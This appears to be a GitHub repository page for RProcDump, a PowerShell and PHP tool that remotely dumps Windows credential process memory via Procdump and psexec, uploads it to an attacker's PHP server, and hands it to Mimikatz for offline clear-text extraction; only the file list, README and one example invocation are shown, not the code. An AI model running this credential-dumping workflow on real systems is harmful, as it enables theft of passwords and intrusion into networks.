Remote process dumping automation. Use it to dump Windows credentials remotely and extract clear text with Mimikatz offline
Languages: PowerShell, PHP
.gitattributes
README.md
RProcDump.ps1
proc32.txt
proc64.txt
procdump.ps1
psx32.txt
psx64.txt
upload.php

All files created Dec 23, 2019

README.md

RProcDump

Remote Windows credentials dump process automation. Can be used to dump Windows credentials remotely and later extract clear text with Mimikatz offline.

Help: Host all files on a web server able to interpret PHP (apache2 on Kali Linux). Edit the parameters in procdump.ps1 and run RProcDump.ps1 with the same parameters on the attack machine. Example:

#> RProcdump -server http://127.0.0.1 -login administrator -pass password123

Requires local admin privileges!

Author: @ThebenyGreen

  • EyesOpenSecurity

Credits: Mark Russinovich, Sysinternals (psexec.exe and Procdump.exe)
